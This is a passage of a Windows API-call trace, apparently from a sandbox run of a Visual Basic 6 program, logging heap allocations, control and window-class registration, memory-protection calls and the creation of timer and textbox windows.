returned 0xe626d8 [0177.029] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63a60 [0177.029] lstrlenA (lpString="VB") returned 2 [0177.033] lstrlenA (lpString="HScrollBar") returned 10 [0177.033] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xe) returned 0xe61c18 [0177.033] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x24) returned 0xe65ee8 [0177.033] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x90) returned 0xe65f18 [0177.033] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe65fb0 [0177.033] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x144) returned 0xe65fe8 [0177.034] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe626f8 [0177.034] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63b88 [0177.034] lstrlenA (lpString="VB") returned 2 [0177.035] lstrlenA (lpString="VScrollBar") returned 10 [0177.035] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xe) returned 0xe61c30 [0177.035] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x24) returned 0xe66138 [0177.035] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x90) returned 0xe66168 [0177.035] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe66200 [0177.035] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x144) returned 0xe66230 [0177.035] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe632d8, Size=0xc8) returned 0xe66380 [0177.035] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62718 [0177.036] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe63380, Size=0xc8) returned 0xe66450 [0177.036] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63cb0 [0177.036] lstrlenA (lpString="VB") returned 2 [0177.036] lstrlenA (lpString="DriveListBox") returned 12 [0177.036] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x10) returned 0xe61c48 [0177.036] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe632d8 [0177.036] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xc0) returned 0xe63308 [0177.036] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x40) returned 0xe633d0 [0177.036] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1a0) returned 0xe66520 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62738 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63dd8 [0177.037] lstrlenA (lpString="VB") returned 2 [0177.037] lstrlenA (lpString="DirListBox") returned 10 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xe) returned 0xe61c60 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe666c8 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xc8) returned 0xe666f8 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x50) returned 0xe667c8 [0177.037] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1b0) returned 0xe66820 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62758 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe63f00 [0177.038] lstrlenA (lpString="VB") returned 2 [0177.038] lstrlenA (lpString="FileListBox") returned 11 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xf) returned 0xe61c78 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x28) returned 0xe669d8 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xec) returned 0xe66a08 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x58) returned 0xe66b00 [0177.038] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1f8) returned 0xe66b60 [0177.039] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62778 [0177.039] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe64028 [0177.039] lstrlenA (lpString="VB") returned 2 [0177.039] lstrlenA (lpString="Menu") returned 4 [0177.039] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x8) returned 0xe63418 [0177.039] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x38) returned 0xe66d60 [0177.039] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x4) returned 0xe55d98 [0177.040] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xb8) returned 0xe66da0 [0177.040] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62798 [0177.040] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe64150 [0177.040] lstrlenA (lpString="VB") returned 2 [0177.040] lstrlenA (lpString="Shape") returned 5 [0177.040] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe61c90 [0177.040] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x1c) returned 0xe66e60 [0177.041] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x68) returned 0xe66e88 [0177.041] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xfc) returned 0xe66ef8 [0177.041] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe66380, Size=0xf0) returned 0xe67000 [0177.041] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe627b8 [0177.041] RtlReAllocateHeap (Heap=0xe50000, Flags=0x0, Ptr=0xe66450, Size=0xf0) returned 0xe670f8 [0177.042] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe64278 [0177.042] lstrlenA (lpString="VB") returned 2 [0177.042] lstrlenA (lpString="Line") returned 4 [0177.042] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x8) returned 0xe55da8 [0177.042] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x18) returned 0xe627d8 [0177.042] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x50) returned 0xe66380 [0177.042] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0xd0) returned 0xe663d8 [0177.042] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe627f8 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe643a0 [0177.043] lstrlenA (lpString="VB") returned 2 [0177.043] lstrlenA (lpString="Image") returned 5 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x9) returned 0xe61ca8 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x24) returned 0xe664b0 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x98) returned 0xe671f0 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x34) returned 0xe664e0 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x154) returned 0xe67290 [0177.043] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62818 [0177.044] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe644c8 [0177.044] lstrlenA (lpString="VB") returned 2 [0177.044] lstrlenA (lpString="Data") returned 4 [0177.044] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x8) returned 0xe673f0 [0177.044] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xd8) returned 0xe67400 [0177.044] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x3c) returned 0xe674e0 [0177.044] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x1d8) returned 0xe67528 [0177.256] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62838 [0177.256] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x114) returned 0xe645f0 [0177.256] lstrlenA (lpString="VB") returned 2 [0177.256] lstrlenA (lpString="OLE") returned 3 [0177.256] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x7) returned 0xe67708 [0177.256] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x17c) returned 0xe67718 [0177.257] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x40) returned 0xe678a0 [0177.257] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x2f0) returned 0xe678e8 [0177.257] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62858 [0177.258] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x10ebcb0 [0177.258] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x10ee358 [0177.258] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x10eeb50 [0177.258] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x10f8028 [0177.258] IMalloc:Alloc (This=0x76da66bc, cb=0x64) returned 0x10f8098 [0177.258] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0x10ee7d0 [0177.259] IMalloc:Alloc (This=0x76da66bc, cb=0x7c) returned 0x10fb2d8 [0177.259] IMalloc:GetSize (This=0x76da66bc, pv=0x10fb2d8) returned 0x7c [0177.259] IMalloc:Alloc (This=0x76da66bc, cb=0x20) returned 0x10f77f0 [0177.259] GetCurrentThreadId () returned 0xa9c [0177.259] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x54) returned 0xe67be0 [0177.260] GetCurrentThreadId () returned 0xa9c [0177.260] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x10f7818 [0177.260] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x104) returned 0xe67c40 [0177.260] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x6f8) returned 0xe67d50 [0177.261] VirtualProtect (in: lpAddress=0x360000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x28fdd0 | out: lpflOldProtect=0x28fdd0*=0x20) returned 1 [0177.262] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x360000, dwSize=0x6000) returned 1 [0177.262] VirtualAlloc (lpAddress=0x360000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0177.262] VirtualAlloc (lpAddress=0x360000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0177.263] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xd4) returned 0xe68450 [0177.268] VirtualAlloc (lpAddress=0x360000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0177.268] VirtualAlloc (lpAddress=0x360000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0177.269] VirtualProtect (in: lpAddress=0x360000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x28fdd0 | out: lpflOldProtect=0x28fdd0*=0x4) returned 1 [0177.269] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x360000, dwSize=0xa000) returned 1 [0177.269] GetCurrentThreadId () returned 0xa9c [0177.270] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x23ec) returned 0xe68530 [0177.364] SetWindowTextA (hWnd=0x403e0, lpString="Using Shell32.dll") returned 1 [0177.364] NtdllDefWindowProc_A (hWnd=0x403e0, Msg=0xc, wParam=0x0, lParam=0x28fd44) returned 0x1 [0177.364] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fd2c | out: phkResult=0x28fd2c*=0x0) returned 0x2 [0177.366] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0177.367] VirtualQuery (in: lpAddress=0x28f758, lpBuffer=0x28f73c, dwLength=0x1c | out: lpBuffer=0x28f73c*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.367] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0x10fb360 [0177.367] IMalloc:GetSize (This=0x76da66bc, pv=0x10fb360) returned 0x6c [0177.368] GetCurrentThreadId () returned 0xa9c [0177.368] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x104) returned 0xe6a928 [0177.368] GetCurrentThreadId () returned 0xa9c [0177.369] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x178) returned 0xe6aa38 [0177.370] GetCurrentThreadId () returned 0xa9c [0177.372] GetCurrentThreadId () returned 0xa9c [0177.372] GetCurrentThreadId () returned 0xa9c [0177.377] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x140) returned 0xe6abb8 [0177.377] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x10) returned 0xe61cc0 [0177.377] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x434) returned 0xe6ad00 [0177.377] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x138 [0177.378] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x198) returned 0xe6b140 [0177.379] GetVersionExA (in: lpVersionInformation=0x28fa54*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1e613c4, dwMinorVersion=0x28f9a4, dwBuildNumber=0x28fc00, dwPlatformId=0x28ff48, szCSDVersion="Í\x1e­w\x16àÏ\x01þÿÿÿ£<©wÎ<©w\x98\x01") | out: lpVersionInformation=0x28fa54*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0177.379] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0177.379] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62878 [0177.380] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x14) returned 0xe62898 [0177.380] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x80) returned 0xe6b2e0 [0177.380] HeapFree (in: hHeap=0xe50000, dwFlags=0x0, lpMem=0xe6b2e0 | out: hHeap=0xe50000) returned 1 [0177.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MS Sans Serif", cbMultiByte=-1, lpWideCharStr=0x28fa7c, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0177.380] OleCreateFontIndirect () returned 0x0 [0177.383] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x160381 [0177.385] OleCreatePictureIndirect () returned 0x0 [0177.386] lstrlenA (lpString="Form1") returned 5 [0177.386] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6b2e0 [0177.386] lstrlenA (lpString="ThunderRT6") returned 10 [0177.386] lstrcpyA (in: lpString1=0x28fa90, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.386] lstrlenA (lpString="ThunderRT6Form") returned 14 [0177.386] lstrcpynA (in: lpString1=0x28fa9e, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0177.386] lstrlenA (lpString="ThunderRT6") returned 10 [0177.386] lstrcpyA (in: lpString1=0x28fa24, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.387] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x28fa50 | out: lpWndClass=0x28fa50) returned 0 [0177.387] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0177.387] RegisterClassA (lpWndClass=0x28fa50) returned 0x61c1c7 [0177.387] lstrlenA (lpString="ThunderRT6") returned 10 [0177.387] lstrcpyA (in: lpString1=0x28fa24, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.387] lstrlenA (lpString="ThunderRT6Form") returned 14 [0177.387] lstrcpynA (in: lpString1=0x28fa32, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0177.387] RegisterClassA (lpWndClass=0x28fa50) returned 0x6ec1c9 [0177.392] AdjustWindowRectEx (in: lpRect=0x28fb50, dwStyle=0x2c80000, bMenu=0, dwExStyle=0x40000 | out: lpRect=0x28fb50) returned 1 [0177.393] CreateWindowExA (dwExStyle=0x40000, lpClassName=0xc1c9, lpWindowName=0x0, dwStyle=0x2c80000, X=-2147483648, Y=-2147483648, nWidth=347, nHeight=292, hWndParent=0x403e0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x203e6 [0177.394] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x81, wParam=0x0, lParam=0x28f674) returned 0x1 [0177.395] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x83, wParam=0x0, lParam=0x28f660) returned 0x0 [0177.396] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="dwmapi.dll", cbMultiByte=10, lpWideCharStr=0x28e0e8, cchWideChar=2047 | out: lpWideCharStr="dwmapi.dll") returned 10 [0177.397] SysReAllocStringLen (in: pbstr=0x28f0ec*=0x0, psz="dwmapi.dll", len=0xa | out: pbstr=0x28f0ec*="dwmapi.dll") returned 1 [0177.397] CharLowerBuffW (in: lpsz="dwmapi.dll", cchLength=0xa | out: lpsz="dwmapi.dll") returned 0xa [0177.397] LoadLibraryExA (lpLibFileName="dwmapi.dll", hFile=0x0, dwFlags=0x0) returned 0x74490000 [0177.406] GetLastError () returned 0x0 [0177.407] SetLastError (dwErrCode=0x0) [0177.407] GetProcAddress (hModule=0x74490000, lpProcName="DwmIsCompositionEnabled") returned 0x74491610 [0177.407] GetSystemMenu (hWnd=0x203e6, bRevert=0) returned 0x6036f [0177.410] SetWindowContextHelpId (param_1=0x203e6, param_2=0xffffffff) returned 1 [0177.410] NtdllDefWindowProc_A (hWnd=0x203e6, Msg=0x1, wParam=0x0, lParam=0x28f674) returned 0x0 [0177.410] GetWindowRect (in: hWnd=0x203e6, lpRect=0x28fb14 | out: lpRect=0x28fb14) returned 1 [0177.410] GetDC (hWnd=0x203e6) returned 0x1a010c57 [0177.410] GetTextMetricsA (in: hdc=0x1a010c57, lptm=0x28fa3c | out: lptm=0x28fa3c) returned 1 [0177.410] SetBkMode (hdc=0x1a010c57, mode=1) returned 2 [0177.411] OleTranslateColor () returned 0x0 [0177.411] SetBkColor (hdc=0x1a010c57, color=0xf0f0f0) returned 0xffffff [0177.411] OleTranslateColor () returned 0x0 [0177.411] SetTextColor (hdc=0x1a010c57, color=0x0) returned 0x0 [0177.411] OleTranslateColor () returned 0x0 [0177.411] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x18300bf5 [0177.411] SelectObject (hdc=0x1a010c57, h=0x18300bf5) returned 0x1b00017 [0177.411] SelectObject (hdc=0x1a010c57, h=0x1900011) returned 0x1900010 [0177.411] ClientToScreen (in: hWnd=0x203e6, lpPoint=0x28fa1c | out: lpPoint=0x28fa1c) returned 1 [0177.411] SetBrushOrgEx (in: hdc=0x1a010c57, x=7, y=5, lppt=0x0 | out: lppt=0x0) returned 1 [0177.411] UnrealizeObject (h=0x1900015) returned 1 [0177.412] SelectObject (hdc=0x1a010c57, h=0x1900015) returned 0x1900011 [0177.412] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe628b8 [0177.412] SelectObject (hdc=0x1a010c57, h=0x3c0a0c53) returned 0x18a002e [0177.412] GetTextMetricsA (in: hdc=0x1a010c57, lptm=0x28f830 | out: lptm=0x28f830) returned 1 [0177.413] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xdc) returned 0xe6b2f0 [0177.413] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe628d8 [0177.414] lstrlenA (lpString="ThunderRT6") returned 10 [0177.414] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.414] lstrlenA (lpString="ThunderRT6") returned 10 [0177.414] lstrcpyA (in: lpString1=0x28f9f4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.414] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Timer", lpWndClass=0x28fa20 | out: lpWndClass=0x28fa20) returned 0 [0177.414] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0177.414] RegisterClassA (lpWndClass=0x28fa20) returned 0x7fc1c8 [0177.414] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c8, lpWindowName=0x0, dwStyle=0x44010000, X=80, Y=24, nWidth=0, nHeight=0, hWndParent=0x203e6, hMenu=0x1, hInstance=0x72940000, lpParam=0x0) returned 0x203f8 [0177.415] SetTimer (hWnd=0x203f8, nIDEvent=0x203f8, uElapse=0x7530, lpTimerFunc=0x0) returned 0x203f8 [0177.415] NtdllDefWindowProc_A (hWnd=0x203f8, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.415] NtdllDefWindowProc_A (hWnd=0x203f8, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.416] NtdllDefWindowProc_A (hWnd=0x203f8, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x0 [0177.416] NtdllDefWindowProc_A (hWnd=0x203f8, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0177.416] NtdllDefWindowProc_A (hWnd=0x203f8, Msg=0x3, wParam=0x0, lParam=0x180050) returned 0x0 [0177.416] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xdc) returned 0xe6b3d8 [0177.416] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe628f8 [0177.417] lstrlenA (lpString="ThunderRT6") returned 10 [0177.417] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.417] CreateWindowExA (dwExStyle=0x4, lpClassName=0xc1c8, lpWindowName=0x0, dwStyle=0x44010000, X=48, Y=24, nWidth=0, nHeight=0, hWndParent=0x203e6, hMenu=0x2, hInstance=0x72940000, lpParam=0x0) returned 0x203f6 [0177.417] SetTimer (hWnd=0x203f6, nIDEvent=0x203f6, uElapse=0x64, lpTimerFunc=0x0) returned 0x203f6 [0177.417] NtdllDefWindowProc_A (hWnd=0x203f6, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.418] NtdllDefWindowProc_A (hWnd=0x203f6, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.418] NtdllDefWindowProc_A (hWnd=0x203f6, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x0 [0177.418] NtdllDefWindowProc_A (hWnd=0x203f6, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0177.419] NtdllDefWindowProc_A (hWnd=0x203f6, Msg=0x3, wParam=0x0, lParam=0x180030) returned 0x0 [0177.472] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xf4) returned 0xe6b4c0 [0177.472] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62918 [0177.472] lstrlenA (lpString="Text4") returned 5 [0177.472] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6b5c0 [0177.473] lstrlenA (lpString="ThunderRT6") returned 10 [0177.473] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.473] lstrlenA (lpString="ThunderRT6") returned 10 [0177.473] lstrcpyA (in: lpString1=0x28f9f4, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.473] GetClassInfoA (in: hInstance=0x0, lpClassName="Edit", lpWndClass=0x28fa20 | out: lpWndClass=0x28fa20) returned 1 [0177.474] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6TextBox", lpWndClass=0x28fa20 | out: lpWndClass=0x28fa20) returned 0 [0177.474] RegisterClassA (lpWndClass=0x28fa20) returned 0x6ec1d6 [0177.474] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text4", dwStyle=0x440100e0, X=160, Y=0, nWidth=33, nHeight=19, hWndParent=0x203e6, hMenu=0x3, hInstance=0x72940000, lpParam=0x0) returned 0x203f4 [0177.474] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.476] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.476] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.478] IsWindow (hWnd=0x203f4) returned 1 [0177.478] IsWindow (hWnd=0x203f4) returned 1 [0177.480] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0177.480] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0177.480] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x3, wParam=0x0, lParam=0x200a2) returned 0x0 [0177.481] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe62938 [0177.481] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x1 [0177.486] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0177.487] ShowWindow (hWnd=0x203f4, nCmdShow=5) returned 0 [0177.487] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0177.487] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0xf4) returned 0xe6b5d0 [0177.487] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x15) returned 0xe62958 [0177.487] lstrlenA (lpString="Text3") returned 5 [0177.487] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x0, Size=0x6) returned 0xe6b6d0 [0177.488] lstrlenA (lpString="ThunderRT6") returned 10 [0177.488] lstrcpyA (in: lpString1=0x28fa60, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0177.488] CreateWindowExA (dwExStyle=0x204, lpClassName=0xc1d6, lpWindowName="Text3", dwStyle=0x440100e0, X=120, Y=0, nWidth=33, nHeight=19, hWndParent=0x203e6, hMenu=0x4, hInstance=0x72940000, lpParam=0x0) returned 0x203f2 [0177.488] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0x81, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.488] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0x83, wParam=0x0, lParam=0x28f630) returned 0x0 [0177.489] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0x1, wParam=0x0, lParam=0x28f644) returned 0x1 [0177.490] IsWindow (hWnd=0x203f2) returned 1 [0177.490] IsWindow (hWnd=0x203f2) returned 1 [0177.490] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0xcc, wParam=0x0, lParam=0x0) returned 0x1 [0177.491] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0x5, wParam=0x0, lParam=0xf001d) returned 0x0 [0177.491] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0x3, wParam=0x0, lParam=0x2007a) returned 0x0 [0177.491] RtlAllocateHeap (HeapHandle=0xe50000, Flags=0x8, Size=0x14) returned 0xe62978 [0177.491] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0x30, wParam=0x3c0a0c53, lParam=0x0) returned 0x1 [0177.492] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, Msg=0xd3, wParam=0xffff, lParam=0x0) returned 0x0 [0177.492] ShowWindow (hWnd=0x203f2, nCmdShow=5) returned 0 [0177.492] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x203f2, 